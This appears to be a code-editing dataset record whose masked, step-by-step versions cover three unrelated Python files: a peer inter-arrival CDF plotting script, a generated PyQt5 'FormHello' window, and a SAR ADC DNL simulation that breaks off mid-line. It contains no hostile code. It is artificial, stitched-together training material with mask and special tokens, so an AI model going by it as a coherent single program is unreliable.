{ "blob_id": "51b28650f8ae6cbda3d81695acd27744e9bfebd1", "index": 2528, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n peer_ids = db_client.get_dangling_peer_ids()\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(diff_in_h=results_df.diff_in_s.apply(lambda\n x: x / 3600))\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n sns.ecdfplot(ax=ax1, x='diff_in_h', data=results_df)\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel('Time in Hours')\n ax1.set_ylabel('Number of Peers in %')\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \n '%d' % int(x * 100)))\n ax1.legend(loc='lower right', labels=[\n f'dangling ({fmt_thousands(len(results_df))})'])\n ax1.title.set_text(f'CDF of Inter Arrival Times of Dangling Peers')\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(diff_in_h=data.diff_in_s.apply(lambda x: x / 3600))\n labels += [f'{agent} ({fmt_thousands(len(data))})']\n sns.ecdfplot(ax=ax2, x='diff_in_h', data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel('Time in Hours')\n ax2.set_ylabel('Number of Peers in %')\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x,\n p: '%d' % int(x * 100)))\n ax2.title.set_text(f'CDF of Inter Arrival Times by Agent')\n ax2.legend(loc='lower right', labels=labels)\n plt.tight_layout()\n lib_plot.savefig('cdf-inter-arrival-dangling')\n plt.show()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n peer_ids = db_client.get_dangling_peer_ids()\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(diff_in_h=results_df.diff_in_s.apply(lambda\n x: x / 3600))\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n sns.ecdfplot(ax=ax1, x='diff_in_h', data=results_df)\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel('Time in Hours')\n ax1.set_ylabel('Number of Peers in %')\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \n '%d' % int(x * 100)))\n ax1.legend(loc='lower right', labels=[\n f'dangling ({fmt_thousands(len(results_df))})'])\n ax1.title.set_text(f'CDF of Inter Arrival Times of Dangling Peers')\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(diff_in_h=data.diff_in_s.apply(lambda x: x / 3600))\n labels += [f'{agent} ({fmt_thousands(len(data))})']\n sns.ecdfplot(ax=ax2, x='diff_in_h', data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel('Time in Hours')\n ax2.set_ylabel('Number of Peers in %')\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x,\n p: '%d' % int(x * 100)))\n ax2.title.set_text(f'CDF of Inter Arrival Times by Agent')\n ax2.legend(loc='lower right', labels=labels)\n plt.tight_layout()\n lib_plot.savefig('cdf-inter-arrival-dangling')\n plt.show()\n\n\nif __name__ == '__main__':\n client = DBClient()\n main(client)\n", "step-4": "import pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom matplotlib import pyplot as plt, ticker\nfrom analysis.report import lib_plot\nfrom analysis.report.lib_agent import known_agents\nfrom analysis.report.lib_fmt import fmt_thousands\nfrom lib_db import DBClient\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n peer_ids = db_client.get_dangling_peer_ids()\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(diff_in_h=results_df.diff_in_s.apply(lambda\n x: x / 3600))\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n sns.ecdfplot(ax=ax1, x='diff_in_h', data=results_df)\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel('Time in Hours')\n ax1.set_ylabel('Number of Peers in %')\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \n '%d' % int(x * 100)))\n ax1.legend(loc='lower right', labels=[\n f'dangling ({fmt_thousands(len(results_df))})'])\n ax1.title.set_text(f'CDF of Inter Arrival Times of Dangling Peers')\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(diff_in_h=data.diff_in_s.apply(lambda x: x / 3600))\n labels += [f'{agent} ({fmt_thousands(len(data))})']\n sns.ecdfplot(ax=ax2, x='diff_in_h', data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel('Time in Hours')\n ax2.set_ylabel('Number of Peers in %')\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x,\n p: '%d' % int(x * 100)))\n ax2.title.set_text(f'CDF of Inter Arrival Times by Agent')\n ax2.legend(loc='lower right', labels=labels)\n plt.tight_layout()\n lib_plot.savefig('cdf-inter-arrival-dangling')\n plt.show()\n\n\nif __name__ == '__main__':\n client = DBClient()\n main(client)\n", "step-5": "import pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom matplotlib import pyplot as plt, ticker\n\nfrom analysis.report import lib_plot\nfrom analysis.report.lib_agent import known_agents\nfrom analysis.report.lib_fmt import fmt_thousands\nfrom lib_db import DBClient\n\n\ndef main(db_client: DBClient):\n sns.set_theme()\n\n peer_ids = db_client.get_dangling_peer_ids()\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n\n results_df = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n results_df = results_df.assign(\n diff_in_h=results_df.diff_in_s.apply(lambda x: x / 3600),\n )\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5), sharey=True)\n\n sns.ecdfplot(ax=ax1, x=\"diff_in_h\", data=results_df)\n\n ax1.set_xlim(0, 48)\n ax1.set_xticks(np.arange(0, 50, step=4))\n ax1.set_xlabel(\"Time in Hours\")\n ax1.set_ylabel(\"Number of Peers in %\")\n ax1.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \"%d\" % int(x * 100)))\n ax1.legend(loc='lower right', labels=[f\"dangling ({fmt_thousands(len(results_df))})\"])\n\n ax1.title.set_text(f\"CDF of Inter Arrival Times of Dangling Peers\")\n\n labels = []\n for agent in known_agents:\n peer_ids = db_client.get_peer_ids_for_agent_versions([agent])\n arrivals = db_client.get_inter_arrival_time(peer_ids)\n data = pd.DataFrame(arrivals, columns=['id', 'peer_id', 'diff_in_s'])\n data = data.assign(\n diff_in_h=data.diff_in_s.apply(lambda x: x / 3600),\n )\n labels += [f\"{agent} ({fmt_thousands(len(data))})\"]\n sns.ecdfplot(ax=ax2, x=\"diff_in_h\", data=data)\n ax2.set_xlim(0, 48)\n ax2.set_xticks(np.arange(0, 50, step=4))\n ax2.set_xlabel(\"Time in Hours\")\n ax2.set_ylabel(\"Number of Peers in %\")\n ax2.get_yaxis().set_major_formatter(ticker.FuncFormatter(lambda x, p: \"%d\" % int(x * 100)))\n\n ax2.title.set_text(f\"CDF of Inter Arrival Times by Agent\")\n ax2.legend(loc='lower right', labels=labels)\n\n plt.tight_layout()\n lib_plot.savefig(\"cdf-inter-arrival-dangling\")\n plt.show()\n\n\nif __name__ == '__main__':\n client = DBClient()\n main(client)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class Ui_FormHello(object): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName('FormHello') FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName('LabelHello') self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName('btnClose') self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName('FormHello') FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName('LabelHello') self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName('btnClose') self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) def retranslateUi(self, FormHello): _translate = QtCore.QCoreApplication.translate FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2')) self.LabelHello.setText(_translate('FormHello', ' Hello, by UI Designer')) self.btnClose.setText(_translate('FormHello', '关闭')) <|reserved_special_token_1|> from PyQt5 import QtCore, QtGui, QtWidgets class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName('FormHello') FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName('LabelHello') self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName('btnClose') self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) def retranslateUi(self, FormHello): _translate = QtCore.QCoreApplication.translate FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2')) self.LabelHello.setText(_translate('FormHello', ' Hello, by UI Designer')) self.btnClose.setText(_translate('FormHello', '关闭')) <|reserved_special_token_1|> # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'FormHello.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_FormHello(object): def setupUi(self, FormHello): FormHello.setObjectName("FormHello") FormHello.resize(705, 477) self.LabelHello = QtWidgets.QLabel(FormHello) self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81)) font = QtGui.QFont() font.setPointSize(12) font.setBold(True) font.setWeight(75) self.LabelHello.setFont(font) self.LabelHello.setObjectName("LabelHello") self.btnClose = QtWidgets.QPushButton(FormHello) self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31)) self.btnClose.setObjectName("btnClose") self.retranslateUi(FormHello) QtCore.QMetaObject.connectSlotsByName(FormHello) def retranslateUi(self, FormHello): _translate = QtCore.QCoreApplication.translate FormHello.setWindowTitle(_translate("FormHello", "Demo2_2")) self.LabelHello.setText(_translate("FormHello", " Hello, by UI Designer")) self.btnClose.setText(_translate("FormHello", "关闭"))
flexible
{ "blob_id": "fc20a2bf09d510892a4d144fbbd2cb2012c3ad98", "index": 8579, "step-1": "<mask token>\n\n\nclass Ui_FormHello(object):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Ui_FormHello(object):\n\n def setupUi(self, FormHello):\n FormHello.setObjectName('FormHello')\n FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName('LabelHello')\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName('btnClose')\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Ui_FormHello(object):\n\n def setupUi(self, FormHello):\n FormHello.setObjectName('FormHello')\n FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName('LabelHello')\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName('btnClose')\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n\n def retranslateUi(self, FormHello):\n _translate = QtCore.QCoreApplication.translate\n FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2'))\n self.LabelHello.setText(_translate('FormHello',\n ' Hello, by UI Designer'))\n self.btnClose.setText(_translate('FormHello', '关闭'))\n", "step-4": "from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_FormHello(object):\n\n def setupUi(self, FormHello):\n FormHello.setObjectName('FormHello')\n FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName('LabelHello')\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName('btnClose')\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n\n def retranslateUi(self, FormHello):\n _translate = QtCore.QCoreApplication.translate\n FormHello.setWindowTitle(_translate('FormHello', 'Demo2_2'))\n self.LabelHello.setText(_translate('FormHello',\n ' Hello, by UI Designer'))\n self.btnClose.setText(_translate('FormHello', '关闭'))\n", "step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'FormHello.ui'\n#\n# Created by: PyQt5 UI code generator 5.15.4\n#\n# WARNING: Any manual changes made to this file will be lost when pyuic5 is\n# run again. Do not edit this file unless you know what you are doing.\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_FormHello(object):\n def setupUi(self, FormHello):\n FormHello.setObjectName(\"FormHello\")\n FormHello.resize(705, 477)\n self.LabelHello = QtWidgets.QLabel(FormHello)\n self.LabelHello.setGeometry(QtCore.QRect(190, 150, 311, 81))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabelHello.setFont(font)\n self.LabelHello.setObjectName(\"LabelHello\")\n self.btnClose = QtWidgets.QPushButton(FormHello)\n self.btnClose.setGeometry(QtCore.QRect(300, 280, 111, 31))\n self.btnClose.setObjectName(\"btnClose\")\n\n self.retranslateUi(FormHello)\n QtCore.QMetaObject.connectSlotsByName(FormHello)\n\n def retranslateUi(self, FormHello):\n _translate = QtCore.QCoreApplication.translate\n FormHello.setWindowTitle(_translate(\"FormHello\", \"Demo2_2\"))\n self.LabelHello.setText(_translate(\"FormHello\", \" Hello, by UI Designer\"))\n self.btnClose.setText(_translate(\"FormHello\", \"关闭\"))\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
<|reserved_special_token_0|> def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num <|reserved_special_token_0|> def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print(CP_LSB) <|reserved_special_token_0|> print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.5)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v print(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])) <|reserved_special_token_0|> for i in range(2 * n): if y[i + 1] != y[i]: bin_size[y[i]] = x[i + 1] - left left = x[i + 1] <|reserved_special_token_0|> plt.plot(bin_num[1:4094], DNL[1:4094]) plt.show() <|reserved_special_token_1|> <|reserved_special_token_0|> Ci_MSB = [32, 16, 8, 4, 2, 1] Ci_LSB = [16, 8, 4, 2, 1] CB = 1 CP_B = 0 CP_LSB = (32 - 1) * (CB + CP_B - 1) + 10 print(CP_LSB) CP_MSB = 0 Csum_LSB = sum(Ci_LSB) + CP_LSB Csum_MSB = sum(Ci_MSB) + CP_MSB Cx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB Wi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)] Wi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)] print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.5)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v print(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])) n = 1000000 x = [(-1 + i / n) for i in range(2 * n + 1)] y = [AtoD(v) for v in x] bin_num = [i for i in range(4096)] bin_size = [(0) for i in range(4096)] left = x[0] for i in range(2 * n): if y[i + 1] != y[i]: bin_size[y[i]] = x[i + 1] - left left = x[i + 1] DNL = [(data * 2047 - 1) for data in bin_size] plt.plot(bin_num[1:4094], DNL[1:4094]) plt.show() <|reserved_special_token_1|> import matplotlib.pyplot as plt Ci_MSB = [32, 16, 8, 4, 2, 1] Ci_LSB = [16, 8, 4, 2, 1] CB = 1 CP_B = 0 CP_LSB = (32 - 1) * (CB + CP_B - 1) + 10 print(CP_LSB) CP_MSB = 0 Csum_LSB = sum(Ci_LSB) + CP_LSB Csum_MSB = sum(Ci_MSB) + CP_MSB Cx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB Wi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)] Wi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)] print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [(0) for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2 code[i + 1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.5)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2 ** (11 - i) * code[i] / 2048 return v print(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])) n = 1000000 x = [(-1 + i / n) for i in range(2 * n + 1)] y = [AtoD(v) for v in x] bin_num = [i for i in range(4096)] bin_size = [(0) for i in range(4096)] left = x[0] for i in range(2 * n): if y[i + 1] != y[i]: bin_size[y[i]] = x[i + 1] - left left = x[i + 1] DNL = [(data * 2047 - 1) for data in bin_size] plt.plot(bin_num[1:4094], DNL[1:4094]) plt.show() <|reserved_special_token_1|> import matplotlib.pyplot as plt Ci_MSB = [32,16,8,4,2,1] Ci_LSB = [16,8,4,2,1] CB = 1 CP_B = 0 CP_LSB = (32-1)*(CB+CP_B-1)+10 print(CP_LSB) CP_MSB = 0 Csum_LSB = sum(Ci_LSB)+CP_LSB Csum_MSB = sum(Ci_MSB)+CP_MSB Cx = Csum_LSB*Csum_MSB+(CB+CP_B)*Csum_LSB+(CB+CP_B)*Csum_MSB Wi_MSB = [Ci_MSB[i]*(CB+CP_B+Csum_LSB)/Cx for i in range (6)] Wi_LSB = [Ci_LSB[i]*(CB+CP_B)/Cx for i in range (5)] print(Wi_MSB) print(Wi_LSB) def AtoD(vin): code = [0 for i in range(12)] code[0] = 1 if vin > 0 else 0 for i in range(6): vin = vin - Wi_MSB[i] * (code[i]-0.5)*2 code[i+1] = 1 if vin > 0 else 0 for i in range(5): vin = vin - Wi_LSB[i] * (code[i+6]-0.5)*2 code[i + 7] = 1 if vin > 0 else 0 dec_num = 0 for b in code: dec_num = dec_num * 2 + b return dec_num print(AtoD(0.50)) def DtoA_ideal(code): v = -1.0 for i in range(12): v += 2**(11-i)*code[i]/2048 return v print(DtoA_ideal([1,1,1,1,1,1,1,1,1,1,1,1])) n=1000000 x = [-1+i/n for i in range(2*n+1)] y = [AtoD(v) for v in x] # print(y[int(n/6):int(n/6)+100]) bin_num = [i for i in range(4096)] bin_size = [0 for i in range(4096)] left = x[0] for i in range(2*n): if y[i+1]!=y[i]: bin_size[y[i]] = x[i+1] - left left = x[i+1] # print(bin_size) DNL = [data*2047 -1 for data in bin_size] plt.plot(bin_num[1:4094],DNL[1:4094]) # plt.xlim(1000,1005) plt.show() # y = [DtoA_ideal(AtoD(v)) for v in x] # plt.plot(x,y) # plt.xlim(-0.01,0) # plt.ylim(-0.01,0) # plt.show() # def Vout(index): # V = 0.0 # for i in range(6): # V = V + Wi_MSB[i] * int(format(index,'b').zfill(11)[i])*1 # for i in range(5): # V = V + Wi_LSB[i] * int(format(index,'b').zfill(11)[i+6])*1 # return V # print(Vout(2047)) # # x = [i for i in range(2048)] # y = [Vout(i) for i in range(2048)] # DNL = [0]+[y[i+1]-y[i]-Vout(2047)/2047 for i in range(2047)] # DNL = [data*2048 for data in DNL] # INL = [y[i] -i*Vout(2047)/2047 for i in range (2048)] # INL = [data*2048 for data in INL] # # plt.plot(x,DNL) # plt.show()
flexible
{ "blob_id": "b5ac3695a224d531f5baa53a07d3c894d44e8c4c", "index": 395, "step-1": "<mask token>\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\n<mask token>\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\n<mask token>\n", "step-2": "<mask token>\nprint(CP_LSB)\n<mask token>\nprint(Wi_MSB)\nprint(Wi_LSB)\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\nprint(AtoD(0.5))\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\nprint(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))\n<mask token>\nfor i in range(2 * n):\n if y[i + 1] != y[i]:\n bin_size[y[i]] = x[i + 1] - left\n left = x[i + 1]\n<mask token>\nplt.plot(bin_num[1:4094], DNL[1:4094])\nplt.show()\n", "step-3": "<mask token>\nCi_MSB = [32, 16, 8, 4, 2, 1]\nCi_LSB = [16, 8, 4, 2, 1]\nCB = 1\nCP_B = 0\nCP_LSB = (32 - 1) * (CB + CP_B - 1) + 10\nprint(CP_LSB)\nCP_MSB = 0\nCsum_LSB = sum(Ci_LSB) + CP_LSB\nCsum_MSB = sum(Ci_MSB) + CP_MSB\nCx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB\nWi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)]\nWi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)]\nprint(Wi_MSB)\nprint(Wi_LSB)\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\nprint(AtoD(0.5))\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\nprint(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))\nn = 1000000\nx = [(-1 + i / n) for i in range(2 * n + 1)]\ny = [AtoD(v) for v in x]\nbin_num = [i for i in range(4096)]\nbin_size = [(0) for i in range(4096)]\nleft = x[0]\nfor i in range(2 * n):\n if y[i + 1] != y[i]:\n bin_size[y[i]] = x[i + 1] - left\n left = x[i + 1]\nDNL = [(data * 2047 - 1) for data in bin_size]\nplt.plot(bin_num[1:4094], DNL[1:4094])\nplt.show()\n", "step-4": "import matplotlib.pyplot as plt\nCi_MSB = [32, 16, 8, 4, 2, 1]\nCi_LSB = [16, 8, 4, 2, 1]\nCB = 1\nCP_B = 0\nCP_LSB = (32 - 1) * (CB + CP_B - 1) + 10\nprint(CP_LSB)\nCP_MSB = 0\nCsum_LSB = sum(Ci_LSB) + CP_LSB\nCsum_MSB = sum(Ci_MSB) + CP_MSB\nCx = Csum_LSB * Csum_MSB + (CB + CP_B) * Csum_LSB + (CB + CP_B) * Csum_MSB\nWi_MSB = [(Ci_MSB[i] * (CB + CP_B + Csum_LSB) / Cx) for i in range(6)]\nWi_LSB = [(Ci_LSB[i] * (CB + CP_B) / Cx) for i in range(5)]\nprint(Wi_MSB)\nprint(Wi_LSB)\n\n\ndef AtoD(vin):\n code = [(0) for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i] - 0.5) * 2\n code[i + 1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i + 6] - 0.5) * 2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\n\n\nprint(AtoD(0.5))\n\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2 ** (11 - i) * code[i] / 2048\n return v\n\n\nprint(DtoA_ideal([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))\nn = 1000000\nx = [(-1 + i / n) for i in range(2 * n + 1)]\ny = [AtoD(v) for v in x]\nbin_num = [i for i in range(4096)]\nbin_size = [(0) for i in range(4096)]\nleft = x[0]\nfor i in range(2 * n):\n if y[i + 1] != y[i]:\n bin_size[y[i]] = x[i + 1] - left\n left = x[i + 1]\nDNL = [(data * 2047 - 1) for data in bin_size]\nplt.plot(bin_num[1:4094], DNL[1:4094])\nplt.show()\n", "step-5": "import matplotlib.pyplot as plt\n\nCi_MSB = [32,16,8,4,2,1]\nCi_LSB = [16,8,4,2,1]\nCB = 1\nCP_B = 0\nCP_LSB = 